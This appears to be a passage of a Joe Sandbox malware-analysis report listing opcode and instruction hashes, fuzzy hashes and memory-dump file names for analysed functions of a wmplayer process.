            • Opcode ID: a471e550afbaca24e97daea720f2096a1ea26e3d9654dd136ad952be21bc7f6e
            • Instruction ID: 38e3b39b82c0447a8d3b38f9c3d38477de6a646c92a53f2e953cfe948e9b8b70
            • Opcode Fuzzy Hash: a471e550afbaca24e97daea720f2096a1ea26e3d9654dd136ad952be21bc7f6e
            • Instruction Fuzzy Hash: B8218BB5600649ABC715DBACC840B6AB7B8FF48740F1800A9F944DB7A1D778ED50CBA9
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a8622e56908f8726de967cb285ad30ec1eeb5fa031882ae5f01e7eafd605776c
            • Instruction ID: 0be58a93d0fef08f57551ea2dce257293a173f2916876ae11b775730057e6379
            • Opcode Fuzzy Hash: a8622e56908f8726de967cb285ad30ec1eeb5fa031882ae5f01e7eafd605776c
            • Instruction Fuzzy Hash: 34219DB290434A9BC711EBE9C848B9BB7ECBF85244F0844D6BC80CB761D774D948C6A2
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
            • Instruction ID: 7ac1a96713f9e8ac1b49306e3e38f6d380abd40916c30d398c0ef7f635834522
            • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
            • Instruction Fuzzy Hash: 4221D072644B04ABE311DE5C8C51B5ABBA5EB88720F04016AF944DB7A0D330D805C7AA
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3670cae0ef8712e89ebfa8472fa7684e67be1dd4d126933d72f7ca35937ab158
            • Instruction ID: 78d57cd42159fb73be0fade60ec16d081f7dd9f9f223bac33403b581777550b3
            • Opcode Fuzzy Hash: 3670cae0ef8712e89ebfa8472fa7684e67be1dd4d126933d72f7ca35937ab158
            • Instruction Fuzzy Hash: B321AF79200B109FC728DF69C900B46B7F5AF88704F1884A8A509CBB51E335E842CB94
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
            • Instruction ID: d842d2839ce2c911f0b889ca27e37e9e6014b8e92d7522d07c8a5aff07d95743
            • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
            • Instruction Fuzzy Hash: C411DDB6600708AFD722DAC8C841FAABBB8EB80754F1400A9E600CF180D675EE44CB69
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 72a756b15f809604534df994d08c8b6419c01da83ed65c087d09d7abbce2b353
            • Instruction ID: 31febe2a348dc7c71d9a18b5aa8c1c74fb999f209cdc916ec66c423fd81b8770
            • Opcode Fuzzy Hash: 72a756b15f809604534df994d08c8b6419c01da83ed65c087d09d7abbce2b353
            • Instruction Fuzzy Hash: C2216D75A00209DFCB14CF98C581AAEBBB5FB89718F2441ADE105AB310CB71AD0ACBD0
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1dddef751bc580b5bfc764d47fbae14a9ec067067031c16aa69471d7a39e4aaa
            • Instruction ID: b6bcc9264ec5a7df5f4793a8720d1c923db8c270c8468f7d5765f1129862231f
            • Opcode Fuzzy Hash: 1dddef751bc580b5bfc764d47fbae14a9ec067067031c16aa69471d7a39e4aaa
            • Instruction Fuzzy Hash: 5A11E23E015A44EAD731FFAAD841A627BA8EBA4A80F144065E804DFA58E378DD01CB65
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 66f4811d3000e578467c1cff5cb2d9017e93e5a17e7fbcfdfcb850d15257fb77
            • Instruction ID: 5cefb8427af4d20012cfed908c011079010a7922d467b89ab65adb526cfe2aa7
            • Opcode Fuzzy Hash: 66f4811d3000e578467c1cff5cb2d9017e93e5a17e7fbcfdfcb850d15257fb77
            • Instruction Fuzzy Hash: 6301C475605648ABE72AE2ED9C84F67A69CEF81399F1D04E5F801DB650DA58DC00C2A2
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e2c59494ea2de9f7254737f3227616e402913c3f0a19b9f35358fed10b11c4e3
            • Instruction ID: f23ab60dcb2e7cab59762d402f156db1bdedac1e44977b19fce0b1ab010bc97a
            • Opcode Fuzzy Hash: e2c59494ea2de9f7254737f3227616e402913c3f0a19b9f35358fed10b11c4e3
            • Instruction Fuzzy Hash: 0C01D676B04744ABD712EBED9C81F6BBAE9DF94214F0400A9FA05C7141EA70ED00C622
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4a202816e7df9526ea31abc278bb0b67cfe27cf60dffb628e66fcb1e713c464d
            • Instruction ID: b00e25f57fa23a47eebac1989bf80a485d63acf886e9fd760957ef46912f979b
            • Opcode Fuzzy Hash: 4a202816e7df9526ea31abc278bb0b67cfe27cf60dffb628e66fcb1e713c464d
            • Instruction Fuzzy Hash: EF119E716007249FD721CFAAC845F6B7BE8EB84304F0544A9FE85CB211D735E840CBA1
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: fe46cc35aa5f9ae521c33f103d0534ea7d97d2b8f9674c427fa131d3814b4a6b
            • Instruction ID: 18d6f80857b4e326c4fbc263694733868e512f4cbc7dc1ae7a95cb0ff6fed1f9
            • Opcode Fuzzy Hash: fe46cc35aa5f9ae521c33f103d0534ea7d97d2b8f9674c427fa131d3814b4a6b
            • Instruction Fuzzy Hash: 7811C275600B48DBD720DFA9C844BAEB7A8FF94700F1804E6E905EB641D679D901C751
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
            • Instruction ID: 1a358945969e191f34c0d988028a0e330ede91b3b142eb89a0ea08b391528a45
            • Opcode Fuzzy Hash: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
            • Instruction Fuzzy Hash: 8F01D27A240609BFD711EFAACC80E62F76EFF84390F444969F10486560C731ECA0CAA5
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
            • Instruction ID: 64a6e1f30e7a97baf427f9ad5e69d7cb551f830ccfdaf572e08e68c8144dfb6a
            • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
            • Instruction Fuzzy Hash: E70126714047259BCB34CFA5D840A36BFAAEF45B6070489ADFC95CB680CB39D460CB60
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3dd1d0fa1a9aa5d4caf740b235fd92e1ac292850a2b8bd13adcd6202bd349b7a
            • Instruction ID: 3d584899706372b78f1cd7dce37d288f8929740d9f58c10f1012ae60c9b9689b
            • Opcode Fuzzy Hash: 3dd1d0fa1a9aa5d4caf740b235fd92e1ac292850a2b8bd13adcd6202bd349b7a
            • Instruction Fuzzy Hash: 3A11A074501318ABDB25EBA8CC41FE8B379EF04710F5045D4A314EA1E0DB709E81CF85
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0d7b1225ee433489396c2ed130aca087e6c849333bd72a8f88db2069b554d661
            • Instruction ID: 0e01c081f6280c4418efc3fb3e5bd8dbaeaa2551d9cf85d7d80b495691431009
            • Opcode Fuzzy Hash: 0d7b1225ee433489396c2ed130aca087e6c849333bd72a8f88db2069b554d661
            • Instruction Fuzzy Hash: B4117936241740EFDB16EF98C980F16BBB8FF48B44F2404A5F905DB6A1D635ED01CA90
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
            • Instruction ID: f9453fb072149e3a298bafbca47da7bb45e410eecb5ce9a7dfe5a52fcd04f3f8
            • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
            • Instruction Fuzzy Hash: 0F0124322002108BDF10EBA9D890BA6B76ABFC5700F1949E5EE01CF345EAB1CC85C7D0
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 417386d30ee7ba53f11408b79ab5936ca2772f78bad4fd5e3564a5787498bae9
            • Instruction ID: 75edad73738d6990c1dc227ca6bfed774ad67aefdfc7a05a5f5b6091ec7fadf1
            • Opcode Fuzzy Hash: 417386d30ee7ba53f11408b79ab5936ca2772f78bad4fd5e3564a5787498bae9
            • Instruction Fuzzy Hash: 19116D35A0120CEBDB05EFA8C850FAE7BBAFB44244F004099E906DB250D635EE11CB91
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
            • Instruction ID: 52e62174f243e457d77d5723e4d44d336e54c8b9dde83c3d4ab1e2c61265efb5
            • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
            • Instruction Fuzzy Hash: 1901B5361007489FDB22E7AAD800ABBB7E9FFC4654F08449AA946CB580DA74E446CB51
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
            • Instruction ID: 898ad8ed6d692b53b56d4591d75fc13cd162a04a797f9ac61fdd2d4d820d1758
            • Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
            • Instruction Fuzzy Hash: 77118E32500B11DFD721DF95C884F22B7E4BF80766F1988ACD4898A5A5C374E890CB10
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
            • Instruction ID: 2d227677e4a949bcba2bd9fdcb52a4c67d376185897dfa21281a015fe0699022
            • Opcode Fuzzy Hash: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
            • Instruction Fuzzy Hash: D001863A700205A7CB12DADEDD00F9FBA6C9F94681B1544A9BD15DB160EA70DA01C760
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
            • Instruction ID: e8bb8f9f6b291edd4a5b00685aac97dfb23511d40e7dc433045e46a61223be4c
            • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
            • Instruction Fuzzy Hash: 3901D47AB01648DBD711DAE8E801F65B3A9ABC4624F1481D5FA26CF380DB74E905C791
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 7fb149136edb9a52abf22e35c5f271194a583892036c5671aa6f312ccac4ef1c
            • Instruction ID: 7263a73830dae6f78a2582caa3b365e12c3ee045163282bda2bd1702c0fe42df
            • Opcode Fuzzy Hash: 7fb149136edb9a52abf22e35c5f271194a583892036c5671aa6f312ccac4ef1c
            • Instruction Fuzzy Hash: 0201F735700A18DFCB14EBF9DC149AEBBB9EF84210F1940E99902EF640EE30DD41C6A1
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
            • Instruction ID: 11027540bb10607d3669843c2b857c968a7747b24058b5db3437c855e9fcc3d7
            • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
            • Instruction Fuzzy Hash: 1F015A722006889FD322D79DC948F36B7ECFB85754F0D04E2E815CBA91D768EC40C621
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e337124a151b08cfea9fe81adcf17bd34289af846ab48b817b6d001b1f841f89
            • Instruction ID: 257dd4f4d73b4d2bc410d53b9cd10f01199d16b70803c343e5fc5d096f426eb6
            • Opcode Fuzzy Hash: e337124a151b08cfea9fe81adcf17bd34289af846ab48b817b6d001b1f841f89
            • Instruction Fuzzy Hash: 7C017C75A10358ABDB10EBE9D805FAEBBB8EF84700F0440A6A500EB280D6B4D900C7A5
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
            • Instruction ID: 0b1f3a4e174359e6db7e511f77e6f2ee85ff3bd97ef0a874183762ea906ab57e
            • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
            • Instruction Fuzzy Hash: 62F04C372447329BC732D6DD4884F7FADB58FC5AA4F1900B5E109DF200CA648C4192D1
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 246a773f1db98ba280226daadf85c7268bce2af37866d501b109f9653f06a9ee
            • Instruction ID: 5e23e773f760dc0ceaae73d371b3d36cdce053de3685ec2c2dafa59e0dacebd0
            • Opcode Fuzzy Hash: 246a773f1db98ba280226daadf85c7268bce2af37866d501b109f9653f06a9ee
            • Instruction Fuzzy Hash: 3F012C75A1020DAFDB00DFA9D941AEEBBF8FF49300F14405AE904FB380D674EA018BA1
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 155f7a2ce994a8b40b68515c562834df5be29127a0037f2b351973bd89d24084
            • Instruction ID: b8dac4dd90754a9b01353871c46b71a4373d09b311690226ddca7e6285a90ec3
            • Opcode Fuzzy Hash: 155f7a2ce994a8b40b68515c562834df5be29127a0037f2b351973bd89d24084
            • Instruction Fuzzy Hash: 9E011AB5A00209AFDB00DFA9D941AAEB7B8EF49344F54405AE504FB280D674E9018BA1
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 33be8875524c6ed0dff03e556365f18b43421474942bc77df7f47db9fdb07b41
            • Instruction ID: bfaf13eb2ebfadf28984fa2d73ccb74490f52bd4b2b3fba54c434aa23b8f61fa
            • Opcode Fuzzy Hash: 33be8875524c6ed0dff03e556365f18b43421474942bc77df7f47db9fdb07b41
            • Instruction Fuzzy Hash: 4E015A75A00209AFCB00EFA9D941AAEB7B8EF48300F10405AE904EB381D674EA018BA1
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
